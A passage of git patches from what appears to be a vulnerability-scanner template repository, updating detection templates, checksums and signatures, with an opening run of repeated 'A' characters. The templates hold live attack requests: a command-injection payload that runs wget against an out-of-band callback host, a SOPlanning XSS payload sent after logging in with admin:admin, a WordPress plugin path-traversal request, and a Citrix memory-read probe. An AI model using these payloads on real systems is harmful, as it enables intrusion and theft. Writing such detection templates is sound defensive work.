AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + + unsafe: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "/nf/auth/webview/done" + - "AuthenticationRequirements" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 19f988178e641bd99aed4bd8e82ff89900ed9f7a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 7 May 2024 00:19:59 +0530 Subject: [PATCH 0629/1768] minor format update --- .../citrix/citrix-oob-memory-read.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml index bae6d3c0ce..de4aff4e5d 100644 --- a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml +++ b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml @@ -1,13 +1,20 @@ id: citrix-oob-memory-read info: - name: Citrix Netscaler ADC and Gateway, Version 13.1-50.23 Out-Of-Bounds Memory Read + name: Citrix Netscaler ADC & Gateway v13.1-50.23 - Out-Of-Bounds Memory Read author: ice3man severity: critical - references: + description: | + The vulnerability would enable an attacker to remotely obtain sensitive information from a NetScaler appliance configured as a Gateway or AAA virtual server via a very commonly connected Web interface, and without requiring authentication. This bug is nearly identical to the Citrix Bleed vulnerability (CVE-2023-4966), except it is less likely to return highly sensitive information to an attacker. + remediation: Update to version 13.1-51.15 or later + impact: The vulnerability allows an attacker to recover potentially sensitive data from memory. Although in most cases nothing of value is returned, we have observed instances where POST request bodies are leaked. + reference: - https://bishopfox.com/blog/netscaler-adc-and-gateway-advisory metadata: shodan-query: http.favicon.hash:-1292923998,-1166125415 + verified: true + max-request: 1 + tags: citrix,netscaller,gateway,oob http: - raw: @@ -27,4 +34,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 From aef46a0c51b9aa7f3178c389e7b5d2bc9dbd85c2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 7 May 2024 05:28:14 +0000 Subject: [PATCH 0630/1768] Auto Generated New Template Addition List [Tue May 7 05:28:14 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 3f504d84d3..0eb85c1a0d 100644 --- a/.new-additions +++ b/.new-additions @@ -11,12 +11,14 @@ http/cves/2023/CVE-2023-32077.yaml http/cves/2023/CVE-2023-38964.yaml http/cves/2023/CVE-2023-43208.yaml http/cves/2023/CVE-2023-44812.yaml +http/cves/2023/CVE-2023-4521.yaml http/cves/2023/CVE-2023-45375.yaml http/cves/2023/CVE-2023-46347.yaml http/cves/2023/CVE-2023-4973.yaml http/cves/2023/CVE-2023-5003.yaml http/cves/2024/CVE-2024-0235.yaml http/cves/2024/CVE-2024-1183.yaml +http/cves/2024/CVE-2024-22927.yaml http/cves/2024/CVE-2024-2340.yaml http/cves/2024/CVE-2024-23917.yaml http/cves/2024/CVE-2024-24131.yaml From 8d63f2e5e7d0c0e1f27f9886a31b3054dd0e0c02 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 7 May 2024 05:28:19 +0000 Subject: [PATCH 0631/1768] Auto Generated Templates Checksum [Tue May 7 05:28:19 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5c2152b8e1..cf411a604c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:d315321b205a1522fe76396ad0aae34803fbcc4e -cves.json-checksum.txt:d71b2b3afa76b54bec28bb2bf6de398a3921e26e +cves.json:0820bc134ca52d7071cc8c6596b3ac37a095a0ae +cves.json-checksum.txt:996eafaef74b06977788950a04aeebf48b096611 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3162,6 +3162,7 @@ http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3 http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542 http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166 +http/cves/2023/CVE-2023-4521.yaml:703c9dc6e4a556456c1f395c7845e71bfa968956 http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 @@ -3247,7 +3248,7 @@ http/cves/2024/CVE-2024-21893.yaml:fbd24aa08d6ee9e7b7c2a235810f1b6ee65aad1a http/cves/2024/CVE-2024-22024.yaml:36f71684ca8bef143db91384fa7437000786c8b0 http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb -http/cves/2024/CVE-2024-22927.yaml:bbbdb360406e25573f485ac8dc95664fc880d53b +http/cves/2024/CVE-2024-22927.yaml:55eada76a32a5cb2d7c30cebb426f9efb40a0c7c http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe http/cves/2024/CVE-2024-2340.yaml:bf15cb04b444f7c09b0602e12e9bb3c77cd7ecf7 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 @@ -8480,7 +8481,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5df245c5d08dbb638d47953c88b039d8490785ba +templates-checksum.txt:a0c7b1d34566a48c85153a7e6866d1c92b0552f0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 06b4e500ecc060e159713e48aafad65161fe4463 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 7 May 2024 05:29:00 +0000 Subject: [PATCH 0632/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 752566410e..f47708f6da 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -16,12 +16,14 @@ on: - 'http/cves/2023/CVE-2023-38964.yaml' - 'http/cves/2023/CVE-2023-43208.yaml' - 'http/cves/2023/CVE-2023-44812.yaml' + - 'http/cves/2023/CVE-2023-4521.yaml' - 'http/cves/2023/CVE-2023-45375.yaml' - 'http/cves/2023/CVE-2023-46347.yaml' - 'http/cves/2023/CVE-2023-4973.yaml' - 'http/cves/2023/CVE-2023-5003.yaml' - 'http/cves/2024/CVE-2024-0235.yaml' - 'http/cves/2024/CVE-2024-1183.yaml' + - 'http/cves/2024/CVE-2024-22927.yaml' - 'http/cves/2024/CVE-2024-2340.yaml' - 'http/cves/2024/CVE-2024-23917.yaml' - 'http/cves/2024/CVE-2024-24131.yaml' From 8dea37b1bebfa567211619932728b91b499156e1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 7 May 2024 05:30:01 +0000 Subject: [PATCH 0633/1768] Auto Template Signing [Tue May 7 05:30:01 UTC 2024] :robot: --- http/cves/2023/CVE-2023-4521.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-4521.yaml b/http/cves/2023/CVE-2023-4521.yaml index 151127ce1b..fbbaafe62a 100644 --- a/http/cves/2023/CVE-2023-4521.yaml +++ b/http/cves/2023/CVE-2023-4521.yaml @@ -48,3 +48,4 @@ http: part: interactsh_protocol words: - "dns" +# digest: 490a00463044022002d89f2b86a35aa84fbf049f2e5074005a9225a3532e05d405dcb474452f7dd10220583d87dc17b3e9d079f09e3e12275e8e07965a6f325121265f93559902e6cd3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f3e097a7f7c72f5545aa82f0f0d47fe6a75a8716 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 7 May 2024 15:54:07 +0530 Subject: [PATCH 0634/1768] Update CNVD-2021-09650.yaml --- http/cnvd/2021/CNVD-2021-09650.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cnvd/2021/CNVD-2021-09650.yaml b/http/cnvd/2021/CNVD-2021-09650.yaml index 5e90506d4b..0e46e34018 100644 --- a/http/cnvd/2021/CNVD-2021-09650.yaml +++ b/http/cnvd/2021/CNVD-2021-09650.yaml @@ -20,7 +20,7 @@ info: http: - raw: - | - POST /guest_auth/guestIsUp.php + POST /guest_auth/guestIsUp.php HTTP/1.1 Host: {{Hostname}} mac=1&ip=127.0.0.1|wget {{interactsh-url}} @@ -32,4 +32,4 @@ http: name: http words: - "http" -# digest: 490a0046304402202d6b248201cb2194c4824f5ec119cef5b993674b0ca7deb993bbb91ce2c4f4e002206eb8515733c686fabf67c25c8b5a3cb2713cf95ec51cd8e696634247b0cb688a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d6b248201cb2194c4824f5ec119cef5b993674b0ca7deb993bbb91ce2c4f4e002206eb8515733c686fabf67c25c8b5a3cb2713cf95ec51cd8e696634247b0cb688a:922c64590222798bb761d5b6d8e72950 From e0bb68750bc46de9dd6e4fe05f54000ad8195cd2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 7 May 2024 17:13:41 +0530 Subject: [PATCH 0635/1768] minor update --- .../vulnerabilities/other/soplanning-xss.yaml | 49 +++++++++++++------ 1 file changed, 33 insertions(+), 16 deletions(-) diff --git a/http/vulnerabilities/other/soplanning-xss.yaml b/http/vulnerabilities/other/soplanning-xss.yaml index bc79e4dbce..76b9e12eb0 100644 --- a/http/vulnerabilities/other/soplanning-xss.yaml +++ b/http/vulnerabilities/other/soplanning-xss.yaml @@ -1,31 +1,48 @@ -id: soplanning-xss +id: CVE-2024-33724 info: name: SOPlanning 1.52.00 Cross Site Scripting author: Kazgangap - severity: high + severity: medium description: | - SOPlanning v1.52.00 is vulnerable to reflected cross-site scripting (XSS) via the 'groupe_id' parameter.A remote unauthenticated attacker can inject JavaScript code leading to session hijacking or account takeover. + SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform. reference: - https://packetstormsecurity.com/files/178434/SOPlanning-1.52.00-Cross-Site-Scripting.html + - https://github.com/fuzzlove/soplanning-1.52-exploits metadata: + verified: true + max-request: 2 vendor: soplanning product: soplanning shodan-query: html:"soplanning" - tags: packetstorm,xss,soplanning + tags: packetstorm,cve,cve2024,authenticated,soplanning,xss http: - - method: GET - path: - - "{{BaseURL}}/www/process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New" + - raw: + - | + POST /process/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - matchers-condition: and + login={{username}}&password={{password}} + + - | + GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + attack: pitchfork + + payloads: + username: + - admin + password: + - admin + + host-redirects: true matchers: - - type: word - words: - - "" - part: body - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains_all(body_2, "", "SOPlanning")' + condition: and From 4fff0d282358aca14133f16434ee8577a8211e56 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 7 May 2024 17:14:02 +0530 Subject: [PATCH 0636/1768] Rename soplanning-xss.yaml to soplanning-xss.yaml --- http/{vulnerabilities/other => cves/2024}/soplanning-xss.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/{vulnerabilities/other => cves/2024}/soplanning-xss.yaml (100%) diff --git a/http/vulnerabilities/other/soplanning-xss.yaml b/http/cves/2024/soplanning-xss.yaml similarity index 100% rename from http/vulnerabilities/other/soplanning-xss.yaml rename to http/cves/2024/soplanning-xss.yaml From 0d66afe6a7c264196905e99f077d635147c36ee0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 7 May 2024 17:14:59 +0530 Subject: [PATCH 0637/1768] Rename soplanning-xss.yaml to CVE-2024-33724.yaml --- http/cves/2024/{soplanning-xss.yaml => CVE-2024-33724.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/cves/2024/{soplanning-xss.yaml => CVE-2024-33724.yaml} (100%) diff --git a/http/cves/2024/soplanning-xss.yaml b/http/cves/2024/CVE-2024-33724.yaml similarity index 100% rename from http/cves/2024/soplanning-xss.yaml rename to http/cves/2024/CVE-2024-33724.yaml From 840888fd1b0b2a1358f1ca5712ee6410cc3484d9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 7 May 2024 11:47:20 +0000 Subject: [PATCH 0639/1768] Auto Generated Templates Checksum [Tue May 7 11:47:20 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index cf411a604c..7dc6d01c57 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -855,7 +855,7 @@ http/cnvd/2020/CNVD-2020-63964.yaml:e340531566025fec2a69c5b211366d34aabebdbf http/cnvd/2020/CNVD-2020-67113.yaml:b6ed5ca5c479927c2d267a6beb708bdc782c1b8a http/cnvd/2020/CNVD-2020-68596.yaml:4a1c644954b7d789b503a390644acfc1c459e1dc http/cnvd/2021/CNVD-2021-01931.yaml:16f6c167f58030d3042772280faea486e8e19a7d -http/cnvd/2021/CNVD-2021-09650.yaml:cd2f4b8a579018a3035fc7ec94d1802ff6e1a276 +http/cnvd/2021/CNVD-2021-09650.yaml:12a182006ce1865f773aebdc5d467e51437cb441 http/cnvd/2021/CNVD-2021-10543.yaml:c1026547067fb7f3dd5601f3f71eec8793222778 http/cnvd/2021/CNVD-2021-14536.yaml:78b9c1a700aedb16c09fb174f3a2b87361e4d757 http/cnvd/2021/CNVD-2021-15822.yaml:2d07bfd7e2578a3cb23bf8d3efb74adf85abd035 @@ -3162,7 +3162,7 @@ http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3 http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542 http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166 -http/cves/2023/CVE-2023-4521.yaml:703c9dc6e4a556456c1f395c7845e71bfa968956 +http/cves/2023/CVE-2023-4521.yaml:e6cc9b5d3082e84529113381bd012c5a16a5a35b http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 @@ -8481,7 +8481,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a0c7b1d34566a48c85153a7e6866d1c92b0552f0 +templates-checksum.txt:1841b08f8a6dd51fe14fbd904321e3b714c72eb8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3242fabe2f07984258600ed3b65bda71422373bd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 7 May 2024 17:17:21 +0530 Subject: [PATCH 0640/1768] fix trail space --- http/cves/2024/CVE-2024-33724.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-33724.yaml b/http/cves/2024/CVE-2024-33724.yaml index 76b9e12eb0..56145be776 100644 --- a/http/cves/2024/CVE-2024-33724.yaml +++ b/http/cves/2024/CVE-2024-33724.yaml @@ -25,7 +25,7 @@ http: Content-Type: application/x-www-form-urlencoded login={{username}}&password={{password}} - + - | GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1 Host: {{Hostname}} From 9f1bf33ed8db6de928b8e6cddc4451dee80618eb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 7 May 2024 11:49:03 +0000 Subject: [PATCH 0641/1768] Auto Template Signing [Tue May 7 11:49:03 UTC 2024] :robot: --- http/cnvd/2021/CNVD-2021-09650.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cnvd/2021/CNVD-2021-09650.yaml b/http/cnvd/2021/CNVD-2021-09650.yaml index 0e46e34018..c506230084 100644 --- a/http/cnvd/2021/CNVD-2021-09650.yaml +++ b/http/cnvd/2021/CNVD-2021-09650.yaml @@ -32,4 +32,4 @@ http: name: http words: - "http" -# digest: 490a0046304402202d6b248201cb2194c4824f5ec119cef5b993674b0ca7deb993bbb91ce2c4f4e002206eb8515733c686fabf67c25c8b5a3cb2713cf95ec51cd8e696634247b0cb688a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022067cf25f298daa2b560fc63730df160e8dec545619c2157c63da48b60dd2135e8022100eb4e2b096d6e640659ad337e303506d4a65d47211414037ec52449106f264578:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1971ae94e683e47cdd079d41a9d10ec35effc89d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 7 May 2024 17:19:33 +0530 Subject: [PATCH 0642/1768] updated macthers --- http/cves/2023/CVE-2023-6989.yaml | 43 +++++++++++++++---------------- 1 file changed, 21 insertions(+), 22 deletions(-) diff --git a/http/cves/2023/CVE-2023-6989.yaml b/http/cves/2023/CVE-2023-6989.yaml index f7cfc2fbcc..c6f8150e45 100644 --- a/http/cves/2023/CVE-2023-6989.yaml +++ b/http/cves/2023/CVE-2023-6989.yaml @@ -7,8 +7,8 @@ info: description: | The Shield Security Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files. reference: + - https://wpscan.com/vulnerability/a485aee7-39a0-418c-9699-9afc53e28f55/ - https://nvd.nist.gov/vuln/detail/CVE-2023-6989 - - https://www.cvedetails.com/cve/CVE-2023-6989/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -18,39 +18,38 @@ info: epss-percentile: 0.68187 cpe: cpe:2.3:a:getshieldsecurity:shield_security:*:*:*:*:*:wordpress:*:* metadata: + verified: true + max-request: 1 vendor: getshieldsecurity product: shield_security framework: wordpress - tags: cve,cve2023,wp,wordpress,wp-plugin,lfi + publicwww-query: "/wp-content/plugins/wp-simple-firewall" + tags: cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security http: - - method: POST - path: - - "{{BaseURL}}/wp-admin/admin-ajax.php" + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 - Accept: "*/*" - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - Connection: close - Sec-Fetch-Dest: empty - Sec-Fetch-Mode: cors - Sec-Fetch-Site: same-origin - - body: | - action=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php + action=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word + part: body words: - '"dashboard_shield"' - '"shield_action"' - '"search_shield"' condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 From d1a408dc2aae563d65846a8a88e8ed750b7bb3a5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 7 May 2024 17:27:32 +0530 Subject: [PATCH 0643/1768] added flow --- http/cves/2024/CVE-2024-0881.yaml | 18 ++++++++++++++++-- 1 file changed, 16 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-0881.yaml b/http/cves/2024/CVE-2024-0881.yaml index a2168da2cf..39883f436c 100644 --- a/http/cves/2024/CVE-2024-0881.yaml +++ b/http/cves/2024/CVE-2024-0881.yaml @@ -12,24 +12,38 @@ info: - https://github.com/fkie-cad/nvd-json-data-feeds classification: epss-score: 0.00043 - epss-percentile: 0.08256 + epss-percentile: 0.08268 metadata: + verified: true max-request: 1 - publicwww-query: "/wp-content/plugins/post-grid/" + publicwww-query: "/wp-content/plugins/user-meta/" tags: cve,cve2023,wpscan,wordpress,wp-plugin,unauth +flow: http(1) && http(2) http: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/user-meta/readme.txt' + + matchers: + - type: word + internal: true + words: + - 'User Profile Builder' + - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free" - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free" + stop-at-first-match: true matchers-condition: and matchers: - type: word words: - '"html"' - '"
Date: Tue, 7 May 2024 17:39:44 +0530 Subject: [PATCH 0644/1768] Update and rename cloudflare-rocketloader-htmli.yaml to cloudflare-rocketloader-htmli.yaml --- .../cloudflare-rocketloader-htmli.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename http/{misconfiguration => miscellaneous}/cloudflare-rocketloader-htmli.yaml (94%) diff --git a/http/misconfiguration/cloudflare-rocketloader-htmli.yaml b/http/miscellaneous/cloudflare-rocketloader-htmli.yaml similarity index 94% rename from http/misconfiguration/cloudflare-rocketloader-htmli.yaml rename to http/miscellaneous/cloudflare-rocketloader-htmli.yaml index 6bfd0a5e37..6f02f699ed 100644 --- a/http/misconfiguration/cloudflare-rocketloader-htmli.yaml +++ b/http/miscellaneous/cloudflare-rocketloader-htmli.yaml @@ -3,7 +3,7 @@ id: cloudflare-rocketloader-htmli info: name: Cloudflare Rocket Loader - HTML Injection author: j3ssie - severity: low + severity: unknown description: | The Rocket Loader feature in Cloudflare allow attackers to inject arbitrary HTML into the website. This can be used to perform various attacks such as phishing, defacement, etc. remediation: Disable the rocket loader or Add a CSP header to fix this issue. @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220078dae8c97372b931bd7435693b67c204a81c9411fcbe20e1fc657d63704bdff02200cc52e3711d11352ce0f241c9cc79a6371d05c0070ec19166837dfcea4382ead:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 